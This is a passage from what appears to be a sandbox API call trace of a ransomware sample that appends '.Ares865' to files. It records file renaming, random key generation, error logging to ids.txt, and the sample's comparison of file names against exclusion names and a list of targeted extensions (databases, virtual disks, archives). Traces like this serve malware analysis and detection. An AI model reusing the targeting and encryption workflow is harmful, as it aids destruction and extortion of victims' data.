param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 220 [0114.751] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 220 [0114.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.751] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9ea6 [0114.752] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xdc, lpOverlapped=0x0) returned 1 [0114.752] CloseHandle (hObject=0x118) returned 1 [0114.752] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.752] CloseHandle (hObject=0x0) returned 0 [0114.752] CloseHandle (hObject=0x0) returned 0 [0114.753] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.753] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.753] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c90 [0114.789] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 215 [0114.789] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.789] GetLastError () returned 0x20 [0114.789] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 237 [0114.789] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 237 [0114.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.791] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9f82 [0114.791] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xed, lpOverlapped=0x0) returned 1 [0114.792] CloseHandle (hObject=0x118) returned 1 [0114.792] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.792] CloseHandle (hObject=0x0) returned 0 [0114.792] CloseHandle (hObject=0x0) returned 0 [0114.792] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.792] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.792] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c70 [0114.815] wsprintfA (in: param_1=0x2ccebc8, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\* FindFirstFile error 3\r\n") returned 292 [0114.815] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\* FindFirstFile error 3\r\n") returned 292 [0114.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.816] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa06f [0114.817] WriteFile (in: hFile=0x120, lpBuffer=0x2ccebc8*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2cce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ccebc8*, lpNumberOfBytesWritten=0x2cce0b4*=0x124, lpOverlapped=0x0) returned 1 [0114.817] CloseHandle (hObject=0x120) returned 1 [0114.817] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0114.827] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 232 [0114.827] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.827] GetLastError () returned 0x20 [0114.827] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 254 [0114.827] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 254 [0114.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.828] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa193 [0114.828] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xfe, lpOverlapped=0x0) returned 1 [0114.829] CloseHandle (hObject=0x118) returned 1 [0114.829] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.829] CloseHandle (hObject=0x0) returned 0 [0114.829] CloseHandle (hObject=0x0) returned 0 [0114.829] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.829] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.829] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c50 [0114.854] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 249 [0114.854] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.854] GetLastError () returned 0x20 [0114.855] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 271 [0114.855] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 271 [0114.855] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.856] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa291 [0114.856] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x10f, lpOverlapped=0x0) returned 1 [0114.857] CloseHandle (hObject=0x118) returned 1 [0114.857] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.857] CloseHandle (hObject=0x0) returned 0 [0114.857] CloseHandle (hObject=0x0) returned 0 [0114.857] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.857] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.857] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0114.881] wsprintfA (in: param_1=0x2ccebc8, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\* FindFirstFile error 3\r\n") returned 292 [0114.881] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\* FindFirstFile error 3\r\n") returned 292 [0114.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.882] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa3a0 [0114.882] WriteFile (in: hFile=0x120, lpBuffer=0x2ccebc8*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2cce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ccebc8*, lpNumberOfBytesWritten=0x2cce0b4*=0x124, lpOverlapped=0x0) returned 1 [0114.883] CloseHandle (hObject=0x120) returned 1 [0114.883] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0114.899] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\desktop.ini.Ares865") returned 42 [0114.899] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), lpNewFileName="C:\\Program Files (x86)\\desktop.ini.Ares865" (normalized: "c:\\program files (x86)\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0114.901] CreateFileW (lpFileName="C:\\Program Files (x86)\\desktop.ini.Ares865" (normalized: "c:\\program files (x86)\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0114.901] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0114.901] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0114.902] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0114.902] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0114.902] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x170 [0114.903] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0114.904] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0114.904] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0114.904] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0114.908] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\paperknee.exe.Ares865") returned 60 [0114.908] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\paperknee.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\paperknee.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\paperknee.exe.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\paperknee.exe.ares865"), dwFlags=0x1) returned 1 [0114.910] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\paperknee.exe.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\paperknee.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xffffffff [0114.910] GetLastError () returned 0x20 [0114.910] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Program Files (x86)\\Windows Sidebar\\paperknee.exe CreateFile error 32\r\n") returned 82 [0114.910] lstrlenA (lpString="[ERROR] C:\\Program Files (x86)\\Windows Sidebar\\paperknee.exe CreateFile error 32\r\n") returned 82 [0114.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.911] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa4c4 [0114.911] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x52, lpOverlapped=0x0) returned 1 [0114.911] CloseHandle (hObject=0x118) returned 1 [0114.912] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\paperknee.exe.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\paperknee.exe.ares865"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\paperknee.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\paperknee.exe"), dwFlags=0x1) returned 1 [0114.912] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.912] CloseHandle (hObject=0x0) returned 0 [0114.912] CloseHandle (hObject=0xffffffff) returned 0 [0114.912] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b6cc007, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x4b6cc007, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xadcc4370, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sbdrop.dll", cAlternateFileName="")) returned 1 [0114.912] lstrcmpiW (lpString1="sbdrop.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0114.912] lstrcmpiW (lpString1="sbdrop.dll", lpString2="aoldtz.exe") returned 1 [0114.912] lstrcmpiW (lpString1="sbdrop.dll", lpString2=".") returned 1 [0114.912] lstrcmpiW (lpString1="sbdrop.dll", lpString2="..") returned 1 [0114.912] lstrcmpiW (lpString1="sbdrop.dll", lpString2="windows") returned -1 [0114.912] lstrcmpiW (lpString1="sbdrop.dll", lpString2="bootmgr") returned 1 [0114.912] lstrcmpiW (lpString1="sbdrop.dll", lpString2="temp") returned -1 [0114.912] lstrcmpiW (lpString1="sbdrop.dll", lpString2="pagefile.sys") returned 1 [0114.912] lstrcmpiW (lpString1="sbdrop.dll", lpString2="boot") returned 1 [0114.913] lstrcmpiW (lpString1="sbdrop.dll", lpString2="ids.txt") returned 1 [0114.913] lstrcmpiW (lpString1="sbdrop.dll", lpString2="ntuser.dat") returned 1 [0114.913] lstrcmpiW (lpString1="sbdrop.dll", lpString2="perflogs") returned 1 [0114.913] lstrcmpiW (lpString1="sbdrop.dll", lpString2="MSBuild") returned 1 [0114.913] lstrlenW (lpString="sbdrop.dll") returned 10 [0114.913] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\paperknee.exe") returned 52 [0114.913] lstrcpyW (in: lpString1=0x2cce44e, lpString2="sbdrop.dll" | out: lpString1="sbdrop.dll") returned="sbdrop.dll" [0114.913] lstrlenW (lpString="sbdrop.dll") returned 10 [0114.913] lstrlenW (lpString="Ares865") returned 7 [0114.913] lstrcmpiW (lpString1="rop.dll", lpString2="Ares865") returned 1 [0114.913] lstrlenW (lpString=".dll") returned 4 [0114.913] lstrcmpiW (lpString1="sbdrop.dll", lpString2=".dll") returned 1 [0114.913] lstrlenW (lpString=".lnk") returned 4 [0114.913] lstrcmpiW (lpString1="sbdrop.dll", lpString2=".lnk") returned 1 [0114.913] lstrlenW (lpString=".ini") returned 4 [0114.913] lstrcmpiW (lpString1="sbdrop.dll", lpString2=".ini") returned 1 [0114.913] lstrlenW (lpString=".sys") returned 4 [0114.913] lstrcmpiW (lpString1="sbdrop.dll", lpString2=".sys") returned 1 [0114.913] lstrlenW (lpString="sbdrop.dll") returned 10 [0114.913] lstrlenW (lpString="bak") returned 3 [0114.913] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0114.913] lstrlenW (lpString="ba_") returned 3 [0114.913] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0114.913] lstrlenW (lpString="dbb") returned 3 [0114.913] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0114.913] lstrlenW (lpString="vmdk") returned 4 [0114.913] lstrcmpiW (lpString1=".dll", lpString2="vmdk") returned -1 [0114.913] lstrlenW (lpString="rar") returned 3 [0114.913] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0114.913] lstrlenW (lpString="zip") returned 3 [0114.913] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0114.914] lstrlenW (lpString="tgz") returned 3 [0114.914] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0114.914] lstrlenW (lpString="vbox") returned 4 [0114.914] lstrcmpiW (lpString1=".dll", lpString2="vbox") returned -1 [0114.914] lstrlenW (lpString="vdi") returned 3 [0114.914] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0114.914] lstrlenW (lpString="vhd") returned 3 [0114.914] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0114.914] lstrlenW (lpString="vhdx") returned 4 [0114.914] lstrcmpiW (lpString1=".dll", lpString2="vhdx") returned -1 [0114.914] lstrlenW (lpString="avhd") returned 4 [0114.914] lstrcmpiW (lpString1=".dll", lpString2="avhd") returned -1 [0114.914] lstrlenW (lpString="db") returned 2 [0114.914] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0114.914] lstrlenW (lpString="db2") returned 3 [0114.914] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0114.914] lstrlenW (lpString="db3") returned 3 [0114.914] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0114.914] lstrlenW (lpString="dbf") returned 3 [0114.914] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0114.914] lstrlenW (lpString="mdf") returned 3 [0114.914] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0114.914] lstrlenW (lpString="mdb") returned 3 [0114.914] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0114.914] lstrlenW (lpString="sql") returned 3 [0114.914] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0114.914] lstrlenW (lpString="sqlite") returned 6 [0114.914] lstrcmpiW (lpString1="op.dll", lpString2="sqlite") returned -1 [0114.914] lstrlenW (lpString="sqlite3") returned 7 [0114.914] lstrcmpiW (lpString1="rop.dll", lpString2="sqlite3") returned -1 [0114.914] lstrlenW (lpString="sqlitedb") returned 8 [0114.914] lstrcmpiW (lpString1="drop.dll", lpString2="sqlitedb") returned -1 [0114.914] lstrlenW (lpString="xml") returned 3 [0114.914] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0114.915] lstrlenW (lpString="$er") returned 3 [0114.915] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0114.915] lstrlenW (lpString="4dd") returned 3 [0114.915] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0114.915] lstrlenW (lpString="4dl") returned 3 [0114.915] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0114.915] lstrlenW (lpString="^^^") returned 3 [0114.915] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0114.915] lstrlenW (lpString="abs") returned 3 [0114.915] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0114.915] lstrlenW (lpString="abx") returned 3 [0114.915] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0114.915] lstrlenW (lpString="accdb") returned 5 [0114.915] lstrcmpiW (lpString1="p.dll", lpString2="accdb") returned 1 [0114.915] lstrlenW (lpString="accdc") returned 5 [0114.915] lstrcmpiW (lpString1="p.dll", lpString2="accdc") returned 1 [0114.915] lstrlenW (lpString="accde") returned 5 [0114.915] lstrcmpiW (lpString1="p.dll", lpString2="accde") returned 1 [0114.915] lstrlenW (lpString="accdr") returned 5 [0114.915] lstrcmpiW (lpString1="p.dll", lpString2="accdr") returned 1 [0114.915] lstrlenW (lpString="accdt") returned 5 [0114.915] lstrcmpiW (lpString1="p.dll", lpString2="accdt") returned 1 [0114.915] lstrlenW (lpString="accdw") returned 5 